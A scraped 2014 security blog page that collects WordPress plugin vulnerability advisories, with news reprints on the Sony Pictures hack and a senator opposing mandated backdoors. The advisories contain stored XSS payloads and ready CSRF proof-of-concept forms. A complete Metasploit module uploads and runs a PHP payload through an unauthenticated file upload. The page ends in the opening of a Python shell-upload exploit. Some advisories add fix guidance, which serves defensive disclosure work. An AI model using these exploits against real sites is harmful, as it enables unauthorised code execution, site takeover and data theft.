MondoUnix Unix, Linux, FreeBSD, BSD, GNU, Kernel , RHEL, CentOS, Solaris, AIX, HP-UX, Mac OS X, Tru64, SCO UnixWare, Xenix, HOWTO, NETWORKING, IPV6

20 Dec 2014

WordPress PWG Random 1.11 CSRF / XSS

# Title: CSRF / Stored XSS Vulnerability in PWG Random Wordpress Plugin 
# Author: Manideep K  
# CVE-ID : CVE-2014-9394
# Plugin Homepage: https://wordpress.org/plugins/pwgrandom/
# Version Affected: 1.11 (probably lower versions)
# Severity: High 
 
# Description: 
# Vulnerable Parameter: pwgrandom_title, pwgrandom_category, etc.
# About Vulnerability: This plugin is vulnerable to a combined CSRF/XSS attack: if an administrator can be tricked into visiting a page crafted by the attacker (via spear phishing or social engineering), the attacker can store arbitrary script in the plugin's settings page. Because that script then runs in the administrator's browser, inside the admin's authenticated session, it can do almost anything the administrator can, from changing site settings to creating users.
# Vulnerability Class:
Cross-Site Request Forgery (https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29)
Cross-Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS))
 
# Steps to Reproduce (PoC):
After installing the plugin
 
Stored XSS: 
1.  Go to Settings -> PWGRandom
2.  Enter the payload "><script>alert(32)</script> in any of the fields. There is no input validation at all: arbitrary characters are accepted even in fields that should only take numbers.
3.  Save changes and the script executes.
4.  Because the value is stored, the script executes again every time the plugin's settings page is visited.
 
The plugin does not use nonces, so the same settings can be changed through a CSRF attack. PoC:
 
<html>
  <body>
    <form action="http://localhost/wordpress/wp-admin/options-general.php?page=pwgrandom" method="POST">
      <input type="hidden" name="pwgrandom_submit_hidden" value="Y" />
      <input type="hidden" name="pwgrandom_title" value="test" />
      <input type="hidden" name="pwgrandom_category" value="blah blahhhhh" />
      <input type="hidden" name="pwgrandom_path" value="hi" />
      <input type="hidden" name="pwgrandom_url_path" value="dmdmdm" />
      <input type="hidden" name="pwgrandom_size" value="this is not number " />
      <input type="hidden" name="pwgrandom_nb_images" value="dddff" />
      <input type="hidden" name="pwgrandom_nb_images_row" value="1" />
      <input type="hidden" name="pwgrandom_nb_image_spacing" value="dss" />
      <input type="hidden" name="Submit" value="Save Changes" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
 
Mitigation: 
Plugin closed
 
# Disclosure:
2014-11-06: Author notified
2014-11-20: WordPress plugin team closed the plugin after receiving no response from the author
2014-12-09: Public disclosure
 
# Credits:
Manideep K
Information Security Researcher
https://in.linkedin.com/in/manideepk


20 Dec 2014

WordPress Twitter 0.7 CSRF / XSS

**************************************************************************************
# Title: CSRF / Stored XSS Vulnerability in Post to Twitter Wordpress Plugin 
# Author: Manideep K
# CVE-ID: CVE-2014-9393  
# Plugin Homepage: https://wordpress.org/plugins/post-to-twitter/
# Version Affected: 0.7  (probably lower versions)
# Severity: High 
 
# Description: 
Vulnerable Parameter: all three fields, for example idptt_twitter_username
Vulnerability Class: 
Cross-Site Request Forgery (https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29)
Cross-Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS))
 
# About Vulnerability: This plugin is vulnerable to a combined CSRF/XSS attack: if an administrator can be tricked into visiting a page crafted by the attacker (via spear phishing or social engineering), the attacker can store arbitrary script in the plugin's settings page. Because that script then runs in the administrator's browser, inside the admin's authenticated session, it can do almost anything the administrator can, from changing site settings to creating users.
 
# Steps to Reproduce (PoC):
After installing the plugin
1. Go to Settings -> Post to Twitter
2. Insert the payload "><script>alert(32)</script> into any or all of the fields
3. Update the options and the script executes
4. Because the value is stored, the script executes again every time the plugin's settings page is visited.
 
The plugin does not use nonces, so the same settings can be changed through a CSRF attack. PoC:
 
<html>
  <body>
    <form action="http://localhost/wordpress/wp-admin/options-general.php" method="POST">
      <input type="hidden" name="idptt_twitter_username" value=" csrf baby" />
      <input type="hidden" name="idptt_twitter_password" value="123@admiN" />
      <input type="hidden" name="idptt_tweet_prefix" value="hey testt - this is also xss ed " />
      <input type="hidden" name="idptt_notify_twitter" value="1" />
      <input type="hidden" name="ak_action" value="idptt_update_settings" />
      <input type="hidden" name="submit" value="Update Post to Twitter Options" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
 
# Mitigation: 
Plugin Closed
 
# Disclosure:
2014-11-06: Author notified
2014-11-20: WordPress plugin team closed the plugin after receiving no response from the author
2014-12-09: Public disclosure
 
# Credits:
Manideep K
Information Security Researcher
https://in.linkedin.com/in/manideepk
***************************************************************************************


17 Dec 2014

Sony cancels premiere of The Interview after hacker terrorist threats


SONY PICTURES has cancelled the New York premiere of controversial film The Interview after hackers who breached the firm's systems last month posted threats on text-sharing site Pastebin.

Sony has also told cinema owners that they can cancel screenings of the comedy after the group responsible for the hack threatened theatres that chose to show it.

The hacker group, which goes by the name of Guardians of Peace (GOP), posted the message on Tuesday, invoking the 9/11 terrorist attacks and warning cinemagoers to avoid seeing the movie, which is about an assassination attempt on North Korean dictator Kim Jong-un.

"We will clearly show it to you at the very time and places The Interview be shown, including the premiere, how bitter fate those who seek fun in terror should be doomed to," the message warned.

Sony warned its current and former employees on Tuesday to be aware that hackers could use their stolen data, including detailed personal information, after the epic breach on its systems last month.

According to Reuters, the company said that the hackers could use private information such as social security numbers, credit card details, bank account information, healthcare information and compensation and other employment-related information.

The warning comes just days after the producers of the upcoming James Bond film confirmed that an early version of the script was among the material stolen by hackers in the same breach.

Eon Productions, which has produced 23 James Bond films since 1962, said it learned of the leak of the screenplay on Saturday.

"An early version of the screenplay for the new Bond film Spectre is amongst the material stolen and illegally made public by hackers who infiltrated the Sony Pictures Entertainment computer system," a statement reads on the movie's official website.

In case you missed it, Sony Pictures Entertainment's servers were breached on 25 November and there has been a plethora of reports regarding leaked emails and information about major Hollywood movies, deals and celebrities ever since.

The hackers have also threatened the firm, leaked its remake of Annie, and posted Sylvester Stallone's social security number online.

The stolen Spectre screenplay hasn't yet been published, but Eon Productions is worried that the hackers might make some or all of its contents public at some point in the near future.

"The screenplay for Spectre is the confidential information of Metro-Goldwyn-Mayer Studios and Danjaq LLC, and is protected by the laws of copyright in the UK and around the world," the statement continues.

"It may not (in whole or in part) be published, reproduced, disseminated or otherwise utilised by anyone who obtains a copy of it.

"Metro-Goldwyn-Mayer Studios and Danjaq LLC will take all necessary steps to protect their rights against the persons who stole the screenplay, and against anyone who makes infringing uses of it or attempts to take commercial advantage of confidential property it knows to be stolen."

Last week, a note reportedly from the group of hackers currently assaulting Sony Pictures, denied reports of employee blackmailing, and challenged the authorities and told the firm to not release controversial comedy The Interview.

The note has been published to Github and we cannot confirm that it is from the Guardians of Peace group. But that is who it claims to be from.

"We are the GOP working all over the world. We know nothing about the threatening email received by Sony staffers, but you should wisely judge by yourself why such things are happening and who is responsible for it," it said.

"We have already given our clear demand to the management team of Sony, however, they have refused to accept."

The message accuses Sony of concentrating on tracing the hacker group when it should be complying to its demands.

It suggested that Sony and the FBI are wasting their time, and advised against the release of The Interview, which is described as an act of "terrorism".

"It seems that you think everything will be well if you find out the attacker, while not reacting to our demand. We are sending you our warning again. Do carry out our demand if you want to escape us," it added.

"And stop immediately showing the movie of terrorism which can break the regional peace and cause the War! You, Sony & FBI cannot find us. We are perfect as much. The destiny of Sony is totally up to the wise reaction & measure of Sony."

North Korea has officially dismissed suggestions that it is directly behind the attack on Sony Pictures, but did concede that it could be the work of one of its glorious supporters.

The official North Korean News Agency - sorry, the glorious official North Korean News Agency - has posted its official response to what the government has called "rumours".

"We do not know where in America Sony Pictures is situated and for what wrongdoings it became the target of the attack, nor do we feel the need to know about it," said the agency.

"What we clearly know is that Sony Pictures is the very one which was going to produce a film abetting a terrorist act while hurting the dignity of the supreme leadership of the Democratic People's Republic of Korea [DPRK] by taking advantage of the hostile policy of the US administration towards the DPRK."

This, it added, could have inspired a glorious citizen to react, because, as it has already said, Sony is producing a film that makes a monkey out of its supreme leader.

"The hacking into Sony Pictures might be a righteous deed of the supporters and sympathisers with the DPRK in response to its appeal," it added, while suggesting that its closest neighbour may be fanning the rumour fires.

"What matters here is that the US set the DPRK as the target of the investigation, far from reflecting on its wrongdoings and being shameful of being taken unawares.

"And the South Korean group, keen on serving its master, groundlessly linked the hacking attack with the DPRK and floated the 'story about the north's involvement', an indication of its inveterate bitterness towards its country fellowmen."

The so-called GOP hacker group broke into Sony's computer system in November and leaked movies and employee information, making it one of the biggest ever cyber security breaches. Now it has begun threatening staff.

"We understand that some of our employees have received an email claiming to be from GOP," a Sony Pictures spokesperson told CNN. "We are aware of the situation and are working with law enforcement."

The FBI has been informed of the emails and is investigating the "person or group responsible for the recent attack on the Sony Pictures network".

Earlier this week it was revealed that Sony didn't make it too difficult for the hackers to breach its systems, and held passwords in a file named 'passwords'.

The hack is playing out badly for Sony and not a day goes by when we are not treated to another revelation from leaked documents or hushed insiders.

The password file included log-ins for services like Facebook and something called MySpace - no, us neither - and suggests that someone at Sony needs a lesson in security, or at the very least, a lesson in file-naming.

This is not the end of revelations that elicit a 'facepalm' response, as we have also learned that Sony has shed a load of social security numbers, including those belonging to Sylvester 'Rocky/Rambo' Stallone and some 47,000 others.

Data management software firm - natch - Identity Finder, trawled through the documents and found details from as far back as 1995. Around a third of social security numbers belonged to current or former Sony employees.

"As we have seen from the myriad data breaches this year, every organisation is vulnerable to an attack," said the firm in a statement.

"Security technologies are an important shield, but minimising the target and reducing the footprint of sensitive data is more critical than ever."

Yesterday security researchers from Trend Micro picked apart malware described in a recent FBI malware warning, and traced it back to the attacks on Sony.

The firm analysed the FBI document and was able to identify the code in question, which it has called BKDR_WIPALL.

Before this image was found the team was not so sure, and declined to link Sony and the attack.

"TrendLabs engineers were recently able to obtain a sample of the 'destructive malware described in reports about the FBI warning to US businesses last December 2'," said the first report from the firm.

"As of this writing, the link between the Sony breach and the malware mentioned by the FBI has yet to be verified."

That did not last long, however, and after some additional probing the researchers pulled out a plum of a piece of evidence.

"This appears to be the same wallpaper described in reports about the recent Sony hack last November 24 bearing the phrase ‘hacked by #GOP'," they wrote about the image.

"Therefore we have reason to believe that this is the same malware used in the recent attack on Sony Pictures."

Sony is still in something of a denial stage, and in a kind of Luddite paradise, and is low on comment about the situation.

The Guardian has seen an internal memo from the company that speaks of the grave situation and how it affects everybody.

"It is now apparent that a large amount of confidential Sony Pictures Entertainment data has been stolen by the cyber attackers, including personnel information and business documents," Sony said, according to the report.

"This is the result of a brazen attack on our company, our employees and our business partners. This theft of Sony materials and the release of employee and other information are malicious criminal acts."

The high-profile hack is turning into a saga, with reports now claiming that the firm's PlayStation servers are being used to distribute data pilfered during the attack.

That's according to security researcher Dan Tentler and a report at Forbes, which claims that Sony PlayStation servers are being used to distribute a 27.78GB archive potentially containing sensitive data swiped from Sony Pictures computers.

Tentler examined the data being shared, and found that some of the hosts contained SSL certificates straight from Sony.

It's unclear what exactly is going on, and Sony has yet to comment. We'll update when we hear more.

This revelation comes a day after the FBI threw its hands into discussions about the hack, at the same time as it emerged that North Korea could be to blame.

The FBI sent out a 'Flash warning' to US businesses with the request that they do not share it with the papers.

Fortunately for people like us, not everyone was listening and one outfit ran to Reuters with the information.

Reuters reports that the document fingers North Korea for an assault on an unnamed outfit in the US. North Korea has since refused to deny involvement in the hack.

The country is reportedly miffed about an upcoming Sony Pictures film about leader Kim Jong-un, called The Interview, which has already caused the North Korean government to complain to the United Nations and the US.

Reports claim that, when asked whether it was involved in the attack, a spokesman for the North Korean government replied: "Wait and see."

While some are clearly not paying attention, the FBI has warned businesses to watch out for attacks that look to separate them from their hardware and communications systems.

"The overwriting of the data files will make it extremely difficult and costly, if not impossible, to recover the data using standard forensic methods," the report said.

The real nut of this would be the actual report, but the FBI has told us in the past that, while it shares such information with businesses, it does not provide the same service to journalists.

While we wait for the agency to respond on this occasion we recall a time in October when we asked for access to a similar document with a Chinese-flavoured warning.

"The FBI's recent notification to our industry partners provides recipients with information they can use to help determine whether their systems have been compromised by these actors, and provides steps they can take to mitigate any continuing threats," it said at the time.

"The FBI continues to aggressively investigate, disrupt and dismantle criminal networks that pose a threat in cyberspace."

Sony Pictures is into its second week of being held in the grasp of hackers with a motive.

The firm is being held to a kind of ransom by a hacker group called GOP and is facing down threats to release information that it would reportedly rather not release.

On top of this, Sony Pictures has lost control over some social media accounts and internal communications systems.

Now some of its movie releases, including Fury with one Brad Pitt, have been leaked in a viewable DVD screener format, suggesting that the hackers have entertainment industry crown jewels, i.e. actual movie content.

TorrentFreak, which ranks the most downloaded movies on BitTorrent on a weekly basis, finds that Fury, a new entry to the list, is the fifth most popular item already.

Around five titles from the Sony camp are in the wild, including a remake of the Annie musical. You have been warned.

According to other reports, Sony has hired the services of security firm Mandiant, which is part of FireEye, to aid in the clean up and, presumably, forensic work.

We have asked both parties to comment on this, or confirm the arrangement. Mandiant declined.

Source: http://www.theinquirer.net/inquirer/news/2383278/gop-hackers-brings-sony-pictures-to-its-knees-with-ransom-demand

16 Dec 2014

Senator: Backdoor for the Feds is a backdoor for hackers


A US Senator is urging Congress to pass laws forbidding Uncle Sam's spies from forcing software and hardware makers to build backdoors.

In an op-ed posted in the LA Times, Sen. Ron Wyden (D-OR) said that there was no safe way to build backdoors into phones, tablets, computers and software without exposing them to hackers to exploit.

Wyden, who this month proposed a bill to ban government agencies from mandating backdoors, noted the mechanisms US agencies want to use for law enforcement and intelligence will double as open invitations for foreign agencies and criminals to pwn devices.

"The problem with this logic is that building a back door into every cellphone, tablet, or laptop means deliberately creating weaknesses that hackers and foreign governments can exploit," Wyden wrote.

"Mandating back doors also removes the incentive for companies to develop more secure products at the time people need them most; if you're building a wall with a hole in it, how much are you going invest in locks and barbed wire?"

Mandatory backdoors in devices and code are a hot topic: g-men argue that being able to tunnel into devices is essential to saving lives by detecting and preventing crime. Privacy advocates, meanwhile, have argued that the tools are a violation of privacy and a major security threat.

Put Senator Wyden firmly in the latter category. He notes that even the government agencies themselves have proven less-than-trustworthy when it comes to handling data collected from citizen devices.

"For years, officials of intelligence agencies like the NSA, as well as the Department of Justice, made misleading and outright inaccurate statements to Congress about data surveillance programs — not once, but repeatedly for over a decade," he said.

"These agencies spied on huge numbers of law-abiding Americans, and their dragnet surveillance of Americans' data did not make our country safer."

Source: http://www.theregister.co.uk/2014/12/15/us_senator_to_congress_close_all_the_backdoors/

16 Dec 2014

WordPress SPNbabble 1.4.1 CSRF / XSS

# Title: CSRF/XSS Vulnerability in SPNbabble WP Plugin 
# Author: Manideep K  
# CVE-ID:  CVE-2014-9339
# Plugin Homepage: https://wordpress.org/plugins/spnbabble/
# Version Affected: 1.4.1 (probably lower versions)
# Severity: High 
 
# About Plugin:
SPNbabble (http://spnbabble.sitepronews.com) lets users create an account and post 140-character micro-blogs with URLs to their followers. Through SPNbabble's setup it can also auto-connect to Twitter, Friendfeed, Plurk, Tumblr, Facebook, Zannel, Youare, Meemi and Utterli. Once installed, the plugin takes your SPNbabble username and password and lets you choose which blog posts are converted into mini-blogs; mirroring your blog onto several social platforms is a good way to keep your message strong.
 
# Description: 
# Vulnerable Parameter: username, password, etc.
# About Vulnerability: This plugin is vulnerable to a combined CSRF/XSS attack: if an administrator can be tricked into visiting a page crafted by the attacker (via spear phishing or social engineering), the attacker can store arbitrary script in the plugin's settings page. Because that script then runs in the administrator's browser, inside the admin's authenticated session, it can do almost anything the administrator can, from changing site settings to creating users.
# Vulnerability Class:
Cross-Site Request Forgery (https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29)
Cross-Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS))
 
# Steps to Reproduce (PoC):
After installing the plugin, save the following exploit code as an .html file and have a logged-in administrator open it and click the Submit button (in a real attack, via social engineering or spear phishing). The forged POST is sent with the administrator's session cookies and the settings are overwritten.
Most of the fields are vulnerable to CSRF + XSS.
<html>
  <body>
    <form action="http://localhost/wordpress/wp-admin/options-general.php?page=spnbabble.php" method="POST">
      <input type="hidden" name="username" value="csrf testing" />
      <input type="hidden" name="password" value="" />
      <input type="hidden" name="blogname" value="" />
      <input type="hidden" name="postprefix" value="New Blog Post:" />
      <input type="hidden" name="spn_enable" value="Yes" />
      <input type="hidden" name="spn_update" value="Yes" />
      <input type="hidden" name="info_update" value="Update Options" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
 
# Recommendations:
a) Validate and sanitise every submitted field on save (treat numeric fields as numbers) and escape stored values on output
b) Protect the settings form with a per-user, per-action nonce (in WordPress: wp_nonce_field() on the form, check_admin_referer() before saving) so that cross-site requests are rejected
 
# Mitigation: 
Plugin Closed
 
# Credits:
Manideep K
Information Security Researcher
https://in.linkedin.com/in/manideepk


16 Dec 2014

WordPress DandyID Services ID 1.5.9 CSRF / XSS

# Title: CSRF/XSS Vulnerability in DandyID Services WP Plugin 
# Author: Manideep K  
# CVE-ID: CVE-2014-9335
# Plugin Homepage: https://wordpress.org/plugins/dandyid-services/
# Version Affected: 1.5.9 (probably lower versions)
# Severity: High 
 
# About Plugin:
DandyID is a free service that enables you to connect, manage, and share all of your online identities from a single location
 
# Description: 
# Vulnerable Parameter: email_address, sidebarTitle, etc.
# About Vulnerability: This plugin is vulnerable to a combined CSRF/XSS attack: if an administrator can be tricked into visiting a page crafted by the attacker (via spear phishing or social engineering), the attacker can store arbitrary script in the plugin's settings page. Because that script then runs in the administrator's browser, inside the admin's authenticated session, it can do almost anything the administrator can, from changing site settings to creating users.
# Vulnerability Class:
Cross-Site Request Forgery (https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29)
Cross-Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS))
 
# Steps to Reproduce (PoC):
After installing the plugin
 
Save the following exploit code as an .html file and have a logged-in administrator open it and click the Submit button (in a real attack, via social engineering or spear phishing). The forged POST is sent with the administrator's session cookies and the settings are overwritten.
Most of the fields are vulnerable to CSRF + XSS.
 
<html>
  <body>
    <form action="http://localhost/wordpress/wp-admin/options-general.php?page=dandyid-services/dandyid-services.php" method="POST">
      <input type="hidden" name="email_address" value="csrf testing" />
      <input type="hidden" name="sidebarTitle" value="" />
      <input type="hidden" name="show_style" value="BOTH" />
      <input type="hidden" name="show_powered_by" value="TRUE" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
 
 
# Recommendations:
a) Validate and sanitise every submitted field on save (treat numeric fields as numbers) and escape stored values on output
b) Protect the settings form with a per-user, per-action nonce (in WordPress: wp_nonce_field() on the form, check_admin_referer() before saving) so that cross-site requests are rejected
 
# Mitigation: 
Plugin Closed
 
# Disclosure:
2014-11-06: Author notified
2014-11-20: WordPress plugin team closed the plugin after receiving no response from the author
2014-12-09: Public disclosure
 
# Credits:
Manideep K
Information Security Researcher
https://in.linkedin.com/in/manideepk


16 Dec 2014

WordPress twitterDash 2.1 CSRF / XSS

**************************************************************************************
# Title: CSRF / Stored XSS Vulnerability in twitterDash Wordpress Plugin 
# Author: Manideep K  
# CVE-ID: CVE-2014-9368
# Plugin Homepage: https://wordpress.org/plugins/twitterdash/
# Version Affected: 2.1 (probably lower versions)
# Severity: High 
 
#About Plugin:
twitterDash adds a panel to the Dashboard showing the last (you choose how many) updates on the friends timeline of your Twitter (http://www.twitter.com) account. You see your friends' profile images, usernames and updates; all the links they posted are active, and each "@username" links to that user's timeline. Enable the update panel and you can update your own timeline from the Dashboard. The plugin does not require the PHP cURL extension, so it runs on any server.
 
# Description: 
Vulnerable Parameter: all three text boxes, for example username_twitterDash
Vulnerability Class: 
Cross-Site Request Forgery (https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29)
Cross-Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS))
 
# About Vulnerability: This plugin is vulnerable to a combined CSRF/XSS attack: if an administrator can be tricked into visiting a page crafted by the attacker (via spear phishing or social engineering), the attacker can store arbitrary script in the plugin's settings page. Because that script then runs in the administrator's browser, inside the admin's authenticated session, it can do almost anything the administrator can, from changing site settings to creating users.
 
# Steps to Reproduce (PoC):
After installing the plugin
1. Go to Settings -> TwitterDash
2. Insert the payload "><script>alert(32)</script> into any or all of the fields
3. Update the settings and the script executes
4. Because the value is stored, the script executes again every time the plugin's settings page is visited.
 
 
The plugin does not use nonces, so the same settings can be changed through a CSRF attack. PoC:
 
 
<html>
  <body>
    <form action="http://localhost/wordpress/wp-admin/options-general.php?page=twitterDash.php" method="POST">
      <input type="hidden" name="username_twitterDash" value="csrf baby" />
      <input type="hidden" name="password_twitterDash" value="hi" />
      <input type="hidden" name="count_twitterDash" value="hi" />
      <input type="hidden" name="update_twitterDash" value="Update Settings" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
 
 
 
# Mitigation: 
Plugin closed
 
# Disclosure:
2014-11-06: Author notified
2014-11-20: WordPress plugin team closed the plugin after receiving no response from the author
2014-12-09: Public disclosure
 
# Credits:
Manideep K
Information Security Researcher
https://in.linkedin.com/in/manideepk
***************************************************************************************


16 Dec 2014

WordPress iTwitter WP 0.04 CSRF / XSS

# Title: CSRF/XSS Vulnerability in iTwitter WP Plugin 
# Author: Manideep K  
# CVE-ID: CVE-2014-9336
# Plugin Homepage: https://wordpress.org/plugins/itwitter/
# Version Affected: 0.04 (probably lower versions)
# Severity: High 
 
# Description: 
# Vulnerable Parameter: itex_t_twitter_username, itex_t_twitter_userpass, etc.
# About Vulnerability: This plugin is vulnerable to a combined CSRF/XSS attack: if an administrator can be tricked into visiting a page crafted by the attacker (via spear phishing or social engineering), the attacker can store arbitrary script in the plugin's settings page. Because that script then runs in the administrator's browser, inside the admin's authenticated session, it can do almost anything the administrator can, from changing site settings to creating users.
# Vulnerability Class:
Cross-Site Request Forgery (https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29)
Cross-Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS))
 
# Steps to Reproduce (PoC):
After installing the plugin
 
Save the following exploit code as an .html file and have a logged-in administrator open it and click the Submit button (in a real attack, via social engineering or spear phishing). The forged POST is sent with the administrator's session cookies and the settings are overwritten.
Most of the fields are vulnerable to CSRF + XSS.
 
<html>
  <body>
    <form action="http://localhost/wordpress/wp-admin/options-general.php?page=iTwitter.php" method="POST">
      <input type="hidden" name="itex_t_twitter_username" value="csrf testing" />
      <input type="hidden" name="itex_t_twitter_userpass" value="" />
      <input type="hidden" name="itex_t_cache_enable" value="0" />
      <input type="hidden" name="itex_t_cache_time" value="3600" />
      <input type="hidden" name="itex_t_cache_where" value="0" />
      <input type="hidden" name="itex_t_cache_file" value="C:\wamp\www\wordpress\wp-content\plugins\itwitter\iTwitterCacheFile.txt" />
      <input type="hidden" name="global_debugenable" value="0" />
      <input type="hidden" name="global_debugenable_forall" value="0" />
      <input type="hidden" name="global_widget" value="0" />
      <input type="hidden" name="global_collapse" value="1" />
      <input type="hidden" name="itex_t_shorturls_service" value="random" />
      <input type="hidden" name="itex_t_post2twitter_enable" value="0" />
      <input type="hidden" name="itex_t_post2twitter_template" value="%title% %excerpt% %url%" />
      <input type="hidden" name="itex_t_replace_links_enable" value="0" />
      <input type="hidden" name="itex_t_last_tweets_enable" value="0" />
      <input type="hidden" name="itex_t_last_tweets_users" value="" />
      <input type="hidden" name="itex_t_last_tweets_pos" value="footer" />
      <input type="hidden" name="info_update" value="Save Changes" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
 
 
 
# Recommendations:
a) Use proper input filtering techniques
b) Use unique tokens such as nonces
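A settings handler and form that apply both recommendations, added here as an example; it is not the plugin's own code. The option names, the submit field, the nonce action 'example_save_settings' and the menu slug 'example' are assumed, and the shape of the form mirrors the PoC above.

```php
<?php
// Added example, not the plugin's own code: a settings page that applies
// both recommendations. Option names, nonce action and menu slug are assumed.

// Handler for the POST that the CSRF page above replays.
function example_handle_settings_post() {
    if ( ! isset( $_POST['example_submit_hidden'] ) ) {
        return; // plain page view, nothing to save
    }
    // b) Nonce: bound to this user and this action, and never embedded in a
    // form on another site, so a cross-site POST fails here with an error page.
    check_admin_referer( 'example_save_settings', 'example_nonce' );

    // The nonce proves intent, not authorisation, so still check capability.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient privileges' );
    }

    // a) Input filtering: free text is stripped of tags and a field that is
    // meant to be numeric is coerced, so "><script>alert(32)</script> is never stored.
    $title      = isset( $_POST['example_title'] ) ? sanitize_text_field( wp_unslash( $_POST['example_title'] ) ) : '';
    $cache_time = isset( $_POST['example_cache_time'] ) ? absint( $_POST['example_cache_time'] ) : 0;

    update_option( 'example_title', $title );
    update_option( 'example_cache_time', $cache_time );
}
add_action( 'admin_init', 'example_handle_settings_post' );

// Settings form: emits the nonce field and escapes stored values on output,
// so a value saved before the fix cannot execute when the page is viewed.
function example_render_settings_form() {
    $title      = get_option( 'example_title', '' );
    $cache_time = get_option( 'example_cache_time', 3600 );
    ?>
    <form method="post" action="<?php echo esc_url( admin_url( 'options-general.php?page=example' ) ); ?>">
        <?php wp_nonce_field( 'example_save_settings', 'example_nonce' ); ?>
        <input type="hidden" name="example_submit_hidden" value="Y" />
        <input type="text" name="example_title" value="<?php echo esc_attr( $title ); ?>" />
        <input type="number" name="example_cache_time" value="<?php echo esc_attr( $cache_time ); ?>" />
        <?php submit_button(); ?>
    </form>
    <?php
}
```

With this in place the hidden-form PoC above is rejected by check_admin_referer() before any option is written, and a payload that reaches the form field is stored stripped and rendered escaped.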
 
# Mitigation: 
Plugin Closed
 
# Disclosure:
2014-11-06:  Author notification
2014-11-20:  WP team action taken: plugin closed, as there was no response from the author
2014-12-09: Public Disclosure
 
# Credits:
Manideep K
Information Security Researcher
https://in.linkedin.com/in/manideepk


16Dec/140

WordPress Download Manager Unauthenticated File Upload

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::HTTP::Wordpress
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(
      info,
      'Name'           => 'Wordpress Download Manager (download-manager) Unauthenticated File Upload',
      'Description'    => %q{
        The WordPress download-manager plugin contains multiple unauthenticated file upload
        vulnerabilities which were fixed in version 2.7.5.
      },
      'Author'         =>
        [
          'Mickael Nadeau',     # initial discovery
          'Christian Mehlmauer' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          # The module exploits another vuln not mentioned in this post, but was also fixed
          ['URL', 'http://blog.sucuri.net/2014/12/security-advisory-high-severity-wordpress-download-manager.html'],
          ['WPVDB', '7706']
        ],
      'Privileged'     => false,
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Targets'        => [['download-manager < 2.7.5', {}]],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Dec 3 2014'))
  end

  # Version check against the plugin's readme.txt
  def check
    check_plugin_version_from_readme('download-manager', '2.7.5')
  end

  def exploit
    filename = "#{rand_text_alpha(10)}.php"

    # Build the multipart body; the part name and filename are what the
    # upload handler expects and echoes back.
    data = Rex::MIME::Message.new
    data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"Filedata\"; filename=\"#{filename}\"")

    print_status("#{peer} - Uploading payload")
    res = send_request_cgi(
      'method'   => 'POST',
      'uri'      => normalize_uri(wordpress_url_backend, 'post.php'),
      'ctype'    => "multipart/form-data; boundary=#{data.bound}",
      'data'     => data.to_s,
      'vars_get' => { 'task' => 'wpdm_upload_files' }
    )

    # The handler responds with the stored file name on success
    if res && res.code == 200 && res.body && res.body.length > 0 && res.body =~ /#{Regexp.escape(filename)}$/
      uploaded_filename = res.body
      register_files_for_cleanup(uploaded_filename)
      print_status("#{peer} - File #{uploaded_filename} successfully uploaded")
    else
      fail_with(Failure::Unknown, "#{peer} - Error on uploading file")
    end

    file_path = normalize_uri(target_uri, 'wp-content', 'uploads', 'download-manager-files', uploaded_filename)

    print_status("#{peer} - Calling uploaded file #{file_path}")
    send_request_cgi(
      {
        'uri'    => file_path,
        'method' => 'GET'
      }, 5)
  end
end


14Dec/140

WordPress WP Symposium 14.11 Shell Upload

#!/usr/bin/python
#
# Exploit Name: Wordpress WP Symposium 14.11 Shell Upload Vulnerability
#
#
# Vulnerability discovered by Claudio Viviani
#
# Exploit written by Claudio Viviani
#
#
# 2014-11-27:  Discovered vulnerability
# 2014-12-01:  Vendor Notification (Twitter)
# 2014-12-02:  Vendor Notification (Web Site) 
# 2014-12-04:  Vendor Notification (E-mail)
# 2014-12-11:  No Response/Feedback
# 2014-12-11:  Published
#
# Video Demo + Fix: https://www.youtube.com/watch?v=pF8lIuLT6Vs
#
# --------------------------------------------------------------------
#
# The upload function located on "/wp-symposium/server/file_upload_form.php " is protected:
#
#   if ($_FILES["file"]["error"] > 0) {
#       echo "Error: " . $_FILES["file"]["error"] . "<br>";
#   } else {
#       $allowedExts = ','.get_option(WPS_OPTIONS_PREFIX.'_image_ext').','.get_option(WPS_OPTIONS_PREFIX.'_doc_ext').','.get_option(WPS_OPTIONS_PREFIX.'_video_ext');
#       //echo "Upload: " . $_FILES["file"]["name"] . "<br>";
#       $ext = pathinfo($_FILES["file"]["name"], PATHINFO_EXTENSION);
#       //echo "Extension: " . $ext . "<br />";
#       if (strpos($allowedExts, $ext)) {
#       $extAllowed = true;
#       } else {
#           $extAllowed = false;
#       }
#       //echo "Type: " . $_FILES["file"]["type"] . "<br>";
#       //echo "Size: " . ($_FILES["file"]["size"] / 1024) . " kB<br>";
#       //echo "Stored in: " . $_FILES["file"]["tmp_name"];
#
#       if (!$extAllowed) {
